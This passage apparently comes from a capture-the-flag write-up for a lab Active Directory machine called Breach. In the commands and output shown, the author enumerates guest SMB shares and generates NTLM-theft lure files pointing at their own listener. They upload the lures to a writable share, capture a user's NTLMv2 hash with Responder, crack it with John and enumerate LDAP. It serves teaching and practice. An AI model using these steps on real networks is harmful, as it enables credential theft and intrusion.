2022</span><br><span class="line">  EC2 Feedback.website                A      527  Tue Jun 21 11:36:17 2016</span><br><span class="line">  EC2 Microsoft Windows Guide.website      A      554  Tue Jun 21 11:36:23 2016</span><br><span class="line"></span><br><span class="line">                7863807 blocks of size 4096. 2594368 blocks available</span><br><span class="line">smb: \Default\Desktop\&gt; cd /</span><br><span class="line">smb: \&gt; ls</span><br><span class="line">  .                                  DR        0  Thu Feb 17 08:12:16 2022</span><br><span class="line">  ..                                DHS        0  Thu Feb 17 10:38:00 2022</span><br><span class="line">  Default                           DHR        0  Thu Feb 10 04:10:33 2022</span><br><span class="line">  desktop.ini                       AHS      174  Sat May  8 04:18:31 2021</span><br><span class="line">  Public                             DR        0  Tue Sep 14 23:08:59 2021</span><br><span class="line">c</span><br><span class="line">                7863807 blocks of size 4096. 2594367 blocks available</span><br><span class="line">smb: \&gt; cd Public</span><br><span class="line">lsmb: \Public\&gt; ls</span><br><span class="line">  .                                  DR        0  Tue Sep 14 23:08:59 2021</span><br><span class="line">  ..                                 DR        0  Thu Feb 17 08:12:16 2022</span><br><span class="line">  AccountPictures                   DHR        0  Thu Feb 17 08:12:33 2022</span><br><span class="line">  desktop.ini                       AHS      174  Sat May  8 04:18:31 2021</span><br><span class="line">  Documents                          DR        0  Wed Aug 18 19:34:55 2021</span><br><span class="line">  Downloads                          DR        0  Sat May  8 04:20:26 2021</span><br><span class="line">  Libraries                         DHR        0  Sat May  8 04:34:49 2021</span><br><span class="line">  Music                              DR        0  Sat May  8 04:20:26 2021</span><br><span class="line">  Pictures                           DR        0  Sat May  8 04:20:26 2021</span><br><span class="line">  Videos                             DR        0  Sat May  8 04:20:26 2021</span><br><span class="line"></span><br><span class="line">                7863807 blocks of size 4096. 2594367 blocks available</span><br><span class="line">smb: \Public\&gt; exit</span><br><span class="line">➜  Breach smbclient  \\\\10.10.91.44\\share -U guest</span><br><span class="line">Password for [WORKGROUP\guest]:</span><br><span class="line">Try &quot;help&quot; to get a list of possible commands.</span><br><span class="line">smb: \&gt; ls</span><br><span class="line">  .                                   D        0  Thu Feb 17 09:11:08 2022</span><br><span class="line">  ..                                DHS        0  Thu Feb 17 10:38:00 2022</span><br><span class="line">  finance                             D        0  Thu Feb 17 06:19:34 2022</span><br><span class="line">  software                            D        0  Thu Feb 17 06:19:12 2022</span><br><span class="line">  transfer                            D        0  Thu Feb 17 09:00:35 2022</span><br><span class="line"></span><br><span class="line">                7863807 blocks of size 4096. 2593844 blocks available</span><br><span class="line">smb: \&gt; cd finance</span><br><span class="line">smb: \finance\&gt; ls</span><br><span class="line">  .                                   D        0  Thu Feb 17 06:19:34 2022</span><br><span class="line">  ..                                  D        0  Thu Feb 17 09:11:08 2022</span><br><span class="line">cd </span><br><span class="line">                7863807 blocks of size 4096. 2593844 blocks available</span><br><span class="line">smb: \finance\&gt; cd ../software</span><br><span class="line">smb: \software\&gt; ls</span><br><span class="line">  .                                   D        0  Thu Feb 17 06:19:12 2022</span><br><span class="line">  ..                                  D        0  Thu Feb 17 09:11:08 2022</span><br><span class="line"></span><br><span class="line">                7863807 blocks of size 4096. 2593844 blocks available</span><br><span class="line">smb: \software\&gt; cd ../transfer</span><br><span class="line">smb: \transfer\&gt; ls</span><br><span class="line">  .                                   D        0  Thu Feb 17 09:00:35 2022</span><br><span class="line">  ..                                  D        0  Thu Feb 17 09:11:08 2022</span><br><span class="line">  claire.pope                         D        0  Thu Feb 17 06:21:35 2022</span><br><span class="line">  diana.pope                          D        0  Thu Feb 17 06:21:19 2022</span><br><span class="line">  julia.wong                          D        0  Thu Feb 17 06:24:39 2022</span><br><span class="line"></span><br><span class="line">                7863807 blocks of size 4096. 2593836 blocks available</span><br><span class="line">smb: \transfer\&gt; cd claire.pope\</span><br><span class="line">lsmb: \transfer\claire.pope\&gt; ls</span><br><span class="line">NT_STATUS_ACCESS_DENIED listing \transfer\claire.pope\*</span><br><span class="line">smb: \transfer\claire.pope\&gt; cd ..</span><br><span class="line">smb: \transfer\&gt; cd diana.pope\</span><br><span class="line">lsmb: \transfer\diana.pope\&gt; ls</span><br><span class="line">NT_STATUS_ACCESS_DENIED listing \transfer\diana.pope\*</span><br><span class="line">smb: \transfer\diana.pope\&gt; cd ../julia.wong\</span><br><span class="line">smb: \transfer\julia.wong\&gt; ls</span><br><span class="line">NT_STATUS_ACCESS_DENIED listing \transfer\julia.wong\*</span><br><span class="line">smb: \transfer\julia.wong\&gt; cd ..</span><br><span class="line">lsmb: \transfer\&gt; ls</span><br><span class="line">c  .                                   D        0  Thu Feb 17 09:00:35 2022</span><br><span class="line">  ..                                  D        0  Thu Feb 17 09:11:08 2022</span><br><span class="line">  claire.pope                         D        0  Thu Feb 17 06:21:35 2022</span><br><span class="line">  diana.pope                          D        0  Thu Feb 17 06:21:19 2022</span><br><span class="line">  julia.wong                          D        0  Thu Feb 17 06:24:39 2022</span><br><span class="line">d ..</span><br><span class="line"></span><br><span class="line">                7863807 blocks of size 4096. 2595871 blocks available</span><br><span class="line">smb: \transfer\&gt; cd ..</span><br><span class="line">smb: \&gt; ls</span><br><span class="line">  .                                   D        0  Thu Feb 17 09:11:08 2022</span><br><span class="line">  ..                                DHS        0  Thu Feb 17 10:38:00 2022</span><br><span class="line">  finance                             D        0  Thu Feb 17 06:19:34 2022</span><br><span class="line">  software                            D        0  Thu Feb 17 06:19:12 2022</span><br><span class="line">  transfer                            D        0  Thu Feb 17 09:00:35 2022</span><br><span class="line"></span><br><span class="line">                7863807 blocks of size 4096. 2595867 blocks available</span><br><span class="line">smb: \&gt; </span><br></pre></td></tr></table></figure></div><p>Found nothing useful than 3 usernames:</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">diana.pope</span><br><span class="line">julia.wong</span><br><span class="line">claire.pope</span><br></pre></td></tr></table></figure></div><p>Since we can upload anything to share <code>share</code>, I used the <code>ntlm_theft.py</code> tool to generate files that would trigger NTLM authentication when accessed. These files would, in turn, cause the target machine to send NTLMv2 hashes to my <code>Responder</code> listener.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">```bash</span><br><span class="line">➜ Breach python3 /home/kali/Tools/tools/ActiveDirectory/ntlm_theft/ntlm_theft.py --generate all --server 10.8.3.249 -f breach</span><br><span class="line">Created: breach/breach.scf (BROWSE TO FOLDER)</span><br><span class="line">Created: breach/breach-(url).url (BROWSE TO FOLDER)</span><br><span class="line">Created: breach/breach-(icon).url (BROWSE TO FOLDER)</span><br><span class="line">Created: breach/breach.lnk (BROWSE TO FOLDER)</span><br><span class="line">Created: breach/breach.rtf (OPEN)</span><br><span class="line">Created: breach/breach-(stylesheet).xml (OPEN)</span><br><span class="line">Created: breach/breach-(fulldocx).xml (OPEN)</span><br><span class="line">Created: breach/breach.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)</span><br><span class="line">Created: breach/breach-(includepicture).docx (OPEN)</span><br><span class="line">Created: breach/breach-(remotetemplate).docx (OPEN)</span><br><span class="line">Created: breach/breach-(frameset).docx (OPEN)</span><br><span class="line">Created: breach/breach-(externalcell).xlsx (OPEN)</span><br><span class="line">Created: breach/breach.wax (OPEN)</span><br><span class="line">Created: breach/breach.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)</span><br><span class="line">Created: breach/breach.asx (OPEN)</span><br><span class="line">Created: breach/breach.jnlp (OPEN)</span><br><span class="line">Created: breach/breach.application (DOWNLOAD AND OPEN)</span><br><span class="line">Created: breach/breach.pdf (OPEN AND ALLOW)</span><br><span class="line">Created: breach/zoom-attack-instructions.txt (PASTE TO CHAT)</span><br><span class="line">Created: breach/Autorun.inf (BROWSE TO FOLDER)</span><br><span class="line">Created: breach/desktop.ini (BROWSE TO FOLDER)</span><br><span class="line">Generation Complete.</span><br><span class="line">➜ Breach </span><br></pre></td></tr></table></figure></div><p>Once the files were generated, I uploaded them to the writable share directory on the Breach machine to prompt NTLM hash theft when accessed by the target:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">➜ Breach smbclient \\\\10.10.125.188\\share -U guest</span><br><span class="line">Password <span class="keyword">for</span> [WORKGROUP\guest]:</span><br><span class="line">Try <span class="string">&quot;help&quot;</span> to get a list of possible commands.</span><br><span class="line">smb: \&gt; <span class="built_in">ls</span></span><br><span class="line">  .                                   D        0  Thu Feb 17 09:11:08 2022</span><br><span class="line">  ..                                DHS        0  Thu Feb 17 10:38:00 2022</span><br><span class="line">  finance                             D        0  Thu Feb 17 06:19:34 2022</span><br><span class="line">  software                            D        0  Thu Feb 17 06:19:12 2022</span><br><span class="line">  transfer                            D        0  Thu Feb 17 09:00:35 2022</span><br><span class="line"></span><br><span class="line">                7863807 blocks of size 4096. 2611148 blocks available</span><br><span class="line">smb: \&gt; <span class="built_in">cd</span> transfer\</span><br><span class="line">smb: \transfer\&gt; <span class="built_in">ls</span></span><br><span class="line">  .                                   D        0  Thu Feb 17 09:00:35 2022</span><br><span class="line">  ..                                  D        0  Thu Feb 17 09:11:08 2022</span><br><span class="line">  claire.pope                         D        0  Thu Feb 17 06:21:35 2022</span><br><span class="line">  diana.pope                          D        0  Thu Feb 17 06:21:19 2022</span><br><span class="line">  julia.wong                          D        0  Thu Feb 17 06:24:39 2022</span><br><span class="line"></span><br><span class="line">                7863807 blocks of size 4096. 2611148 blocks available</span><br><span class="line">smb: \transfer\&gt; recurse</span><br><span class="line">smb: \transfer\&gt; prompt</span><br><span class="line">smb: \transfer\&gt; mput *</span><br><span class="line">putting file breach-(frameset).docx as \transfer\breach-(frameset).docx (20.0 kb/s) (average 20.0 kb/s)</span><br><span class="line">putting file zoom-attack-instructions.txt as \transfer\zoom-attack-instructions.txt (0.2 kb/s) (average 10.2 kb/s)</span><br><span class="line">putting file breach.rtf as \transfer\breach.rtf (0.2 kb/s) (average 6.9 kb/s)</span><br><span class="line">putting file breach.scf as \transfer\breach.scf (0.2 kb/s) (average 5.1 kb/s)</span><br><span class="line">putting file Autorun.inf as \transfer\Autorun.inf (0.2 kb/s) (average 4.2 kb/s)</span><br><span class="line">putting file breach.htm as \transfer\breach.htm (0.2 kb/s) (average 3.5 kb/s)</span><br><span class="line">putting file breach.m3u as \transfer\breach.m3u (0.1 kb/s) (average 2.9 kb/s)</span><br><span class="line">putting file breach-(externalcell).xlsx as \transfer\breach-(externalcell).xlsx (11.7 kb/s) (average 3.9 kb/s)</span><br><span class="line">putting file breach-(url).url as \transfer\breach-(url).url (0.1 kb/s) (average 3.5 kb/s)</span><br><span class="line">putting file breach-(fulldocx).xml as \transfer\breach-(fulldocx).xml (85.8 kb/s) (average 15.9 kb/s)</span><br><span class="line">putting file breach-(includepicture).docx as \transfer\breach-(includepicture).docx (16.5 kb/s) (average 15.9 kb/s)</span><br><span class="line">putting file breach.lnk as \transfer\breach.lnk (3.9 kb/s) (average 15.0 kb/s)</span><br><span class="line">putting file breach.pdf as \transfer\breach.pdf (0.1 kb/s) (average 5.8 kb/s)</span><br><span class="line">putting file breach.wax as \transfer\breach.wax (0.0 kb/s) (average 4.9 kb/s)</span><br><span class="line">putting file breach-(icon).url as \transfer\breach-(icon).url (0.2 kb/s) (average 4.7 kb/s)</span><br><span class="line">putting file breach.application as \transfer\breach.application (2.8 kb/s) (average 4.7 kb/s)</span><br><span class="line">putting file breach.asx as \transfer\breach.asx (0.2 kb/s) (average 4.6 kb/s)</span><br><span class="line">putting file breach.jnlp as \transfer\breach.jnlp (0.3 kb/s) (average 4.5 kb/s)</span><br><span class="line">putting file breach-(stylesheet).xml as \transfer\breach-(stylesheet).xml (0.2 kb/s) (average 4.3 kb/s)</span><br><span class="line">putting file breach-(remotetemplate).docx as \transfer\breach-(remotetemplate).docx (23.0 kb/s) (average 5.2 kb/s)</span><br><span class="line">putting file desktop.ini as \transfer\desktop.ini (0.1 kb/s) (average 5.0 kb/s)</span><br><span class="line">smb: \transfer\&gt; <span class="built_in">exit</span></span><br></pre></td></tr></table></figure></div><p>Uploaded all theft files to share and responder successfully captured an NTLMv2 hash for the user Julia.Wong</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><span class="line">➜  Breach <span class="built_in">sudo</span> responder -I tun0</span><br><span class="line">                                         __</span><br><span class="line">  .----.-----.-----.-----.-----.-----.--|  |.-----.----.</span><br><span class="line">  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|</span><br><span class="line">  |__| |_____|_____|   __|_____|__|__|_____||_____|__|</span><br><span class="line">                   |__|</span><br><span class="line"></span><br><span class="line">           NBT-NS, LLMNR &amp; MDNS Responder 3.1.5.0</span><br><span class="line"></span><br><span class="line">  To support this project:</span><br><span class="line">  Github -&gt; https://github.com/sponsors/lgandx</span><br><span class="line">  Paypal  -&gt; https://paypal.me/PythonResponder</span><br><span class="line"></span><br><span class="line">  Author: Laurent Gaffie (laurent.gaffie@gmail.com)</span><br><span class="line">  To <span class="built_in">kill</span> this script hit CTRL-C</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">[+] Poisoners:</span><br><span class="line">    LLMNR                      [ON]</span><br><span class="line">    NBT-NS                     [ON]</span><br><span class="line">    MDNS                       [ON]</span><br><span class="line">    DNS                        [ON]</span><br><span class="line">    DHCP                       [OFF]</span><br><span class="line"></span><br><span class="line">[+] Servers:</span><br><span class="line">    HTTP server                [ON]</span><br><span class="line">    HTTPS server               [ON]</span><br><span class="line">    WPAD proxy                 [OFF]</span><br><span class="line">    Auth proxy                 [OFF]</span><br><span class="line">    SMB server                 [ON]</span><br><span class="line">    Kerberos server            [ON]</span><br><span class="line">    SQL server                 [ON]</span><br><span class="line">    FTP server                 [ON]</span><br><span class="line">    IMAP server                [ON]</span><br><span class="line">    POP3 server                [ON]</span><br><span class="line">    SMTP server                [ON]</span><br><span class="line">    DNS server                 [ON]</span><br><span class="line">    LDAP server                [ON]</span><br><span class="line">    MQTT server                [ON]</span><br><span class="line">    RDP server                 [ON]</span><br><span class="line">    DCE-RPC server             [ON]</span><br><span class="line">    WinRM server               [ON]</span><br><span class="line">    SNMP server                [OFF]</span><br><span class="line"></span><br><span class="line">[+] HTTP Options:</span><br><span class="line">    Always serving EXE         [OFF]</span><br><span class="line">    Serving EXE                [OFF]</span><br><span class="line">    Serving HTML               [OFF]</span><br><span class="line">    Upstream Proxy             [OFF]</span><br><span class="line"></span><br><span class="line">[+] Poisoning Options:</span><br><span class="line">    Analyze Mode               [OFF]</span><br><span class="line">    Force WPAD auth            [OFF]</span><br><span class="line">    Force Basic Auth           [OFF]</span><br><span class="line">    Force LM downgrade         [OFF]</span><br><span class="line">    Force ESS downgrade        [OFF]</span><br><span class="line"></span><br><span class="line">[+] Generic Options:</span><br><span class="line">    Responder NIC              [tun0]</span><br><span class="line">    Responder IP               [10.8.3.249]</span><br><span class="line">    Responder IPv6             [fe80::8324:bd2d:eee6:ed4f]</span><br><span class="line">    Challenge <span class="built_in">set</span>              [random]</span><br><span class="line">    Don<span class="string">&#x27;t Respond To Names     [&#x27;</span>ISATAP<span class="string">&#x27;, &#x27;</span>ISATAP.LOCAL<span class="string">&#x27;]</span></span><br><span class="line"><span class="string">    Don&#x27;</span>t Respond To MDNS TLD  [<span class="string">&#x27;_DOSVC&#x27;</span>]</span><br><span class="line">    TTL <span class="keyword">for</span> poisoned response  [default]</span><br><span class="line"></span><br><span class="line">[+] Current Session Variables:</span><br><span class="line">    Responder Machine Name     [WIN-8AE4H5Y72AG]</span><br><span class="line">    Responder Domain Name      [9R1O.LOCAL]</span><br><span class="line">    Responder DCE-RPC Port     [47249]</span><br><span class="line"></span><br><span class="line">[+] Listening <span class="keyword">for</span> events...                                                                                         </span><br><span class="line"></span><br><span class="line">[SMB] NTLMv2-SSP Client   : 10.10.91.44</span><br><span class="line">[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong</span><br><span class="line">[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:3fb0618fee561123:FFE6A04B30E9304C1331CE2A08F20A1F:0101000000000000809DF4A59F2ADB011BF26CE5D5A300AB00000000020008003900520031004F0001001E00570049004E002D003800410045003400480035005900370052004100470004003400570049004E002D00380041004500340048003500590037003200410047002E003900520131004F002E004C004F00430041004C00030014003900520031004F002E004C004F00430041004C00050014003900520031004F002E004C004F00430041004C0007000800809DF4A59F2ADB01060004000200000002003000300000000000000001000000002000003F5B9BA801E1EEF4176F0E5DEB5A4F4F2414D2BDF7D71400DC0A2B1F004C708C0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E0038002E0033002E003200340039000000000000000000                                                                                           </span><br><span class="line">[*] Skipping previously captured <span class="built_in">hash</span> <span class="keyword">for</span> BREACH\Julia.Wong</span><br><span class="line">[*] Skipping previously captured <span class="built_in">hash</span> <span class="keyword">for</span> BREACH\Julia.Wong</span><br><span class="line">[*] Skipping previously captured <span class="built_in">hash</span> <span class="keyword">for</span> BREACH\Julia.Wong</span><br></pre></td></tr></table></figure></div><p>With the captured hash, I used John the Ripper and the rockyou.txt wordlist to attempt cracking the password for <code>Julia.Wong</code></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">➜  Breach john <span class="built_in">hash</span> --wordlist=/usr/share/wordlists/rockyou.txt</span><br><span class="line">Using default input encoding: UTF-8</span><br><span class="line">Loaded 1 password <span class="built_in">hash</span> (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])</span><br><span class="line">Will run 4 OpenMP threads</span><br><span class="line">Press <span class="string">&#x27;q&#x27;</span> or Ctrl-C to abort, almost any other key <span class="keyword">for</span> status</span><br><span class="line">[....]        (Julia.Wong)     </span><br><span class="line">1g 0:00:00:00 DONE (2024-10-30 07:47) 12.50g/s 1510Kp/s 1510Kc/s 1510KC/s bratz1234..042602</span><br><span class="line">Use the <span class="string">&quot;--show --format=netntlmv2&quot;</span> options to display all of the cracked passwords reliably</span><br><span class="line">Session completed. </span><br></pre></td></tr></table></figure></div><p>After successfully cracking the NTLM hash for <code>Julia.Wong</code>, I proceeded to validate the credentials using <code>nxc</code> </p><h4 id="Initial-access"><a href="#Initial-access" class="headerlink" title="Initial access"></a>Initial access</h4><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">➜ Breach nxc smb 10.10.91.44 -u Julia.Wong -p [....]</span><br><span class="line">SMB         10.10.91.44     445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.10.91.44     445    BREACHDC         [+] breach.vl\Julia.Wong:[...]</span><br></pre></td></tr></table></figure></div><p>Now got a valid credentials in DC. I checked for any kerberoastable users in DC with ADEnum tool</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br></pre></td><td class="code"><pre><span class="line">➜  Breach python3 ~/Tools/ADenum/ADenum.py -d breach.vl -u Julia.Wong -p [...] -ip 10.10.91.44 </span><br><span class="line"></span><br><span class="line">   █████╗ ██████╗     ███████╗███╗   ██╗██╗   ██╗███╗   ███╗</span><br><span class="line">  ██╔══██╗██╔══██╗    ██╔════╝████╗  ██║██║   ██║████╗ ████║</span><br><span class="line">  ███████║██║  ██║    █████╗  ██╔██╗ ██║██║   ██║██╔████╔██║</span><br><span class="line">  ██╔══██║██║  ██║    ██╔══╝  ██║╚██╗██║██║   ██║██║╚██╔╝██║</span><br><span class="line">  ██║  ██║██████╔╝    ███████╗██║ ╚████║╚██████╔╝██║ ╚═╝ ██║</span><br><span class="line">  ╚═╝  ╚═╝╚═════╝     ╚══════╝╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">[*] Domain name:        breach.vl</span><br><span class="line">[*] Username:      Julia.Wong</span><br><span class="line">[*] IP Address:  10.10.91.44</span><br><span class="line">[!] SSL supported:  FALSE</span><br><span class="line">[!] SSL connect:        FALSE</span><br><span class="line"></span><br><span class="line">[+] Succesfully Authenticated With LDAP</span><br><span class="line"></span><br><span class="line">[-] Authentication mechanism</span><br><span class="line">[+] GSSAPI</span><br><span class="line">[+] GSS-SPNEGO</span><br><span class="line">[+] EXTERNAL</span><br><span class="line">[!] DIGEST-MD5                                           Consider as weak security protocols</span><br><span class="line">[-] LOGIN                                                         Plaintext password</span><br><span class="line">[-] PLAIN                                                         Plaintext password</span><br><span class="line"></span><br><span class="line">====================================================</span><br><span class="line">===================== Enum LDAP ====================</span><br><span class="line">====================================================</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">[-] Users <span class="built_in">who</span> are Domain Admin</span><br><span class="line">[*] Username: Administrator            CN=Administrator,CN=Users,DC=breach,DC=vl</span><br><span class="line">[*] Username: Julia.Wong               CN=Julia Wong,OU=staff,DC=breach,DC=vl</span><br><span class="line">[*] Username: Christine.Bruce          CN=Christine Bruce,OU=staff,DC=breach,DC=vl</span><br><span class="line"></span><br><span class="line">[-] Domain Controllers</span><br><span class="line">[*] Computer: BREACHDC$                CN=BREACHDC,OU=Domain Controllers,DC=breach,DC=vl</span><br><span class="line">        [V] Windows Server 2022 Datacenter 10.0 (20348)</span><br><span class="line"></span><br><span class="line">[-] Users with Password Not Expire</span><br><span class="line">[*] Username: Guest                    CN=Guest,CN=Users,DC=breach,DC=vl</span><br><span class="line">[*] Username: Claire.Pope              CN=Claire Pope,OU=staff,DC=breach,DC=vl</span><br><span class="line">[*] Username: Julia.Wong               CN=Julia Wong,OU=staff,DC=breach,DC=vl</span><br><span class="line">[*] Username: Hilary.Reed              CN=Hilary Reed,OU=staff,DC=breach,DC=vl</span><br><span class="line">[*] Username: Diana.Pope               CN=Diana Pope,OU=staff,DC=breach,DC=vl</span><br><span class="line">[*] Username: Jasmine.Price            CN=Jasmine Price,OU=staff,DC=breach,DC=vl</span><br><span class="line">[*] Username: George.Williams          CN=George Williams,OU=staff,DC=breach,DC=vl</span><br><span class="line">[*] Username: Lawrence.Kaur            CN=Lawrence Kaur,OU=staff,DC=breach,DC=vl</span><br><span class="line">[*] Username: Jasmine.Slater           CN=Jasmine Slater,OU=staff,DC=breach,DC=vl</span><br><span class="line">[*] Username: Hugh.Watts               CN=Hugh Watts,OU=staff,DC=breach,DC=vl</span><br><span class="line">[*] Username: Christine.Bruce          CN=Christine Bruce,OU=staff,DC=breach,DC=vl</span><br><span class="line">[*] Username: svc_mssql                CN=svc_mssql,CN=Users,DC=breach,DC=vl</span><br><span class="line"></span><br><span class="line">[-] Users with old password</span><br><span class="line">[!] Username: Administrator            Password last change: 985 days ago 2022-02-17 09:33:46</span><br><span class="line">[!] Username: Guest                    Password last change: 985 days ago 2022-02-17 13:36:50</span><br><span class="line">[!] Username: krbtgt                   Password last change: 985 days ago 2022-02-17 10:04:57</span><br><span class="line">[!] Username: Claire.Pope              Password last change: 985 days ago 2022-02-17 10:36:11</span><br><span class="line">[!] Username: Julia.Wong               Password last change: 985 days ago 2022-02-17 12:58:50</span><br><span class="line">[!] Username: Hilary.Reed              Password last change: 985 days ago 2022-02-17 10:36:11</span><br><span class="line">[!] Username: Diana.Pope               Password last change: 985 days ago 2022-02-17 10:36:11</span><br><span class="line">[!] Username: Jasmine.Price            Password last change: 985 days ago 2022-02-17 10:36:11</span><br><span class="line">[!] Username: George.Williams          Password last change: 985 days ago 2022-02-17 10:36:11</span><br><span class="line">[!] Username: Lawrence.Kaur            Password last change: 985 days ago 2022-02-17 10:36:12</span><br><span class="line">[!] Username: Jasmine.Slater           Password last change: 985 days ago 2022-02-17 